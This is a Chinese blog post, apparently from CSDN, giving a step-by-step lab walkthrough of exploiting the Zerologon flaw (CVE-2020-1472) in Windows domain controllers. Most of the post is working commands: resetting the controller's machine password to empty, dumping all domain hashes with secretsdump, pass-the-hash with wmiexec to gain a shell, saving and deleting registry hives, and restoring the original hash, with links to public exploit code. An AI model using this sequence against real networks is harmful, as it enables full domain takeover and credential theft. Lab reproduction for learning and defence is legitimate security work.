基于NetLogon权限提升漏洞(CVE-2020-1472)的域控踢拳学习

最新推荐文章于 2023-02-22 19:04:32 发布
最新推荐文章于 2023-02-22 19:04:32 发布
阅读量255 收藏
点赞数
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40806924/article/details/118340617
版权

NetLogon权限提升漏洞(CVE-2020-1472)

**漏洞评分10分,**漏洞利用后果严重,未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞。成功利用此漏洞的攻击者可获得域管理员访问权限。

影响版本:

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

搭建域控

环境:域控windows 2008 Server,成员windows 7(当然不是域内成员,只要能ping通域控即可)

参考大佬文章
https://www.cnblogs.com/forforever/p/13682344.html

漏洞利用

准备python3 (win7 sp1 最高只能装到3.7.5 再高需要升级)

安装 impacket 包

pip install impacket 导包       uninstall 卸载

使用方法(两种)
1、exp cve-2020-1472.py 放到script目录 一般是自动放到\python\Scripts\ (去python文件夹去找找)

2、直接安装好后不用将exp cve-2020-1472.py拷入,安装了impacket,直接使用包中的secretsdump.py即可。

ping一下域控看是否ping通 检查通路

注意:安装了impacket包之后,包中自带一个ping.py。所以利用系统的ping,需要指定ping.exe,否则ping 会识别成ping.py.

ping.exe X.x.x.x

利用:

python CVE-2020-1472.py AD-SERVER AD-SERVER$ xx.xx.x.x
pyt
hon CVE-2020-1472.py 域控nbios名 域控主机名$ 域控IP

域控名称: 右键我的电脑 -> 右下角更改设置 -> 更改 -> 勾选域,输入域名,上面添上域控名称 ->重启即可。

在这里插入图片描述
语法:

python secretsdump.py server08.com/AD-Server$@192.168.2.208 -just-dc -no-pass
python secretsdump.py server08.com/AD-Server$@192.168.2.208 -no-pass 导出所有hash
以上两条都可以。
python secretsdump.py 域名/域控名称$@域控IP -just-dc -no-pass  #-just-dc只导出域控的NTDS.dit数据(NTLM hash和Kerberos hash)-no-pass 不询问密码

在这里插入图片描述
参考大佬复现结果

Server08$用户hash已被替换为31d6cfe0d16ae931b73c59d7e0c089c0 (空)。

在这里插入图片描述

横向转移
使用administrator的hash横向连接过去

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f Server08/administrator@192.168.2.208
python wmiexec.py -hashes LM:NT DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr

shell到手
在这里插入图片描述

获取计算机账号原始hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

简单理解为 存储 获取 删除(可能理解有偏差)

参考大佬结果
在这里插入图片描述
提取hash

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述
将该原始计算机帐户哈希还原

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
python3 reinstall_original_pw.py WIN-2008-DC 192.168.3.123 6493fcc57bd126e9ab8fb9f56e8a79c9

在这里插入图片描述
查看WIN-2008-DC$账号的hash,已成功还原

secretsdump.py ggyao.com/administrator:1qaz@WSX@192.168.3.123 -just-dc-user 'WIN-2008-DC$'

在这里插入图片描述
可进可退乃真英雄

暂时还没有使用场景 可能后期还需更改。 仅作学习参考!!!

exp:

https://github.com/Kamimuka/CVE-2020-1472
https://github.com/risksense/zerologon
https://github.com/SecuraBV/CVE-2020-1472

参考链接:
https://www.cnblogs.com/forforever/p/13682344.html
域控搭建:
https://blog.csdn.net/wwl012345/article/details/88934571
https://jingyan.baidu.com/article/19192ad8e1593ae53e5707be.html
复现:
https://mp.weixin.qq.com/s/MSLbzg2hCoTSVTtEIxxpNQ
https://blog.csdn.net/mukami0621/article/details/108605941
https://blog.csdn.net/lhh134/article/details/108630955

ChungYii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-1472NetLogon权限提升漏洞
谢公子的博客
10-12 2778
目录 impacket攻击 挂socks5代理打 使用mimikatz攻击 恢复域控的机器用户哈希 获得域控机器账号原始哈希 方式一 : 方式二: 恢复域控原始哈希 impacket攻击 先执行如下命令判断域控是否存在该漏洞 python3 zerologon_tester.py win2008 192.168.10.131 该脚本会将域控的机器账号哈希置为空 #查询域控的机器用户哈希 ./secretsdump.py xie.com/administrator:p..
CVE-2020-1472 NetLogon 特权提升漏洞1
08-03
CVE-2020-1472 NetLogon 特权提升漏洞1
kali渗透之DC-1
余笙.'的博客
11-21 686
kali渗透DC-1靶机
CVE-2020-1472: NetLogon特权提升漏洞(附exp复现)
热门推荐
02-06 2万+
漏洞描述: 2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 漏洞级别:严重 漏洞编号:CVE-2020-1472 漏洞复现: 准备工具: Impacket工具包:htt...
DC中本机账户文件转移到域账户
weixin_42728126的博客
01-11 565
0x0 前言 朋友的公司初建,公司的PC要调整磁盘重装系统并且加域,但是他想保留现在的C盘。他们的管理员说不行。我记得是可以的,后来做了测试证明了下,下面是过程。 0x1 GHO备份 直接用GHOST 备份C盘为GHO文件,并保存到其他移动存储设备上。 0x2 调整磁盘并恢复系统 磁盘调整后,直接用Ghost恢复到C盘 0x3 加域并修改计算机名 重装完系统后,加域后再修改计算机名(...
Impacket工具使用
qq_18811919的博客
02-22 2528
Impacket工具包使用
内网渗透-环境搭建
kracer的博客
12-05 3944
目录 一、环境要求 二、开始搭建 三、验证搭建结果 一、环境要求 Windows server 2012 R2 标准版 -- 域控 Windows server 2008 R2 标准版 -- 域成员 Windows 7 旗舰版 -- web服务器+域成员 二、开始搭建 1、Windows2012:安装域控制器,生成了域环境 (1)网络桥接到VMnet2,并配置静态IP地址10.1.1.1/24 (2)添加域服务和DNS服务,...
CVE-2020-1472 域内提权
网络安全。
09-16 6062
0x1 工具 这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。 运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce
Centos7.5离线安装mysql8.0.17
u013306729的专栏
09-10 395
一、安装步骤 #切换到安装目录 cd /data/mysql/setup #解压MySQL安装文件包 tar vxf mysql-8.0.17-1.el7.x86_64.rpm-bundle.tar #删除mariadb相关安装包 yum remove -y mariadb* MariaDB* #安装mysql与xtrabackup yum localinstall -y mysql-community-common-8.0.17-1.el7.x86_64.rpm mysql-community-lib
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
ZeroLogon测试脚本 使用Impacket库测试Zerologon漏洞CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补域控制器后,检测脚本将在发送2000对RPC调用后放弃,并得出结论目标不是易受攻击的对象(错误的可能性为0.04%)。 安装 需要Python 3.7或更高版本以及Pip。 安装依赖项,如下所示: pip install -r requirements.txt 请注意,只要脚本不会被以后的Impacket版本破坏,运行pip install impacket应能正常工作。 运行脚本 脚本目标可用于目标DC或备用DC。 它也可能针对只读DC工作,但是尚未经过测试。 给定一个名为IP地址为1.2.3.4名为EXAMPLE-DC的域控制器,请如下
CVE-2020-1472:CVE-2020-1472亦称Zerologon的利用代码
03-18
CVE-2020-1472 CVE-2020-1472又称为Zerologon的检查和利用代码 测试域控制器是否容易受到Zerologon攻击,如果容易受到攻击,它将把域控制器的帐户密码重置为空字符串。 注意:它可能会破坏生产环境中的内容(例如...
zerologon:RPCTCP和RPCSMB的CVE-2020-1472的测试脚本
05-04
证明CVE-2020-1472可以通过RPC / SMB来完成,而不仅可以通过RPC / TCP来完成。 另外,最终的客户端挑战和客户端凭证中有一个随机字节-用于测试琐碎的IDS签名。 RPC / SMB扫描默认运行。 根据目标服务器的不同,...
CVE-2020-1472:PoC for Zerologon-所有研究学分归Secura的Tom Tervoort所有
03-16
CVE-2020-1472 POC 需要来自的最新版本,并添加了netlogon结构。 请注意,默认情况下,这会更改域控制器帐户的密码。 是的,这允许您进行DCSync,但同时也会中断与其他域控制器的通信,因此请当心! 更多信息和...
node-v12.16.3-x86.msi
最新发布
04-25
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
云计算基础课件—架构dr.pptx
04-25
云计算基础课件—架构dr.pptx
067ssm-jsp-mysql艺诚美业管理系统.zip(可运行源码+数据库文件+文档)
04-25
L文主要是对艺诚美业管理系统进行了介绍,包括研究的现状,还有涉及的开发背景,然后还对系统的设计目标进行了论述,还有系统的需求,以及整个的设计方案,对系统的设计以及实现,也都论述的比较细致,最后对艺诚美业管理系统进行了一些具体测试。 本文以JSP为开发技术,实现了一个艺诚美业管理系统。艺诚美业管理系统的主要使用者分为管理员;个人中心、会员管理、员工管理、员工打卡管理、技师预约管理、发型美容师管理、技师类型管理、套餐信息管理、套餐类型管理、套餐购买管理、会员充值管理、系统管理,员工;个人中心、员工打卡管理、技师预约管理,会员;个人中心、技师预约管理、套餐购买管理、会员充值管理,前台首页;首页、发型美容师、套餐信息、我的、跳转到后台等功能。通过这些功能模块的设计,基本上实现了整个艺诚美业管理系统的过程。 具体在系统设计上,采用了B/S的结构,同时,也使用JSP技术在动态页面上进行了设计,后台上采用Mysql数据库,是一个非常优秀的艺诚美业管理系统。 关键词 :艺诚美业管理系统;JSP技术;Mysql数据库;B/S结构
【微信小程序毕业设计】外卖点餐系统开发项目(源码+演示视频+说明).rar
04-25
【微信小程序毕业设计】外卖点餐系统开发项目(源码+演示视频+说明).rar 【项目技术】 微信小程序开发工具+java后端+mysql 【演示视频-编号:242】 https://pan.quark.cn/s/cb634e7c02b5 【实现功能】 有管理员,外卖员,餐厅,用户共四个角色。管理员功能有个人中心,外卖员管理,餐厅管理,用户管理,菜品分类管理,菜品信息管理,外卖订单管理,订单配送管理,订单评价管理,在线留言管理,系统管理等。外卖员,餐厅,用户都可以在微信小程序上面进行注册和登录操作。餐厅角色可以在微信小程序上面进行菜品的添加,修改,删除,查询操作,可以对用户的订单进行审核操作,查看订单配送状态和评价,可以查看投诉反馈和在线留言等。外卖员角色可以在微信小程序上面进行订单的抢单操作,查看订单配送和评价信息等。 用户角色可以在微信小程序上面进行菜品的查看和查询,对自己下的订单进行支付操作,查看订单配送和对订单评价,收藏菜品等操作。
oplog4j是java项目生成操作日志的工具,兼容spring(高分项目).zip
04-25
Java SSM项目是一种使用Java语言和SSM框架(Spring + Spring MVC + MyBatis)开发的Web应用程序。SSM是一种常用的Java开发框架组合,它结合了Spring框架、Spring MVC框架和MyBatis框架的优点,能够快速构建可靠、高效的企业级应用。 1. Spring框架:Spring是一个轻量级的Java开发框架,提供了丰富的功能和模块,用于开发企业级应用。它包括IoC(Inverse of Control,控制反转)容器、AOP(Aspect-Oriented Programming,面向切面编程)等特性,可以简化开发过程、提高代码的可维护性和可测试性。 2. Spring MVC框架:Spring MVC是基于Spring框架的Web框架,用于开发Web应用程序。它采用MVC(Model-View-Controller,模型-视图-控制器)的架构模式,将应用程序分为模型层、视图层和控制器层,提供了处理请求、渲染视图和管理流程的功能。 3. MyBatis框架:MyBatis是一个持久层框架,用于与数据库进行交互。它提供了一种将数据库操作与Java对象映射起来的方式,避免了手动编写繁琐的SQL语句,并提供了事务管理和缓存等功能,简化了数据库访问的过程
CVE-2020-1472
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值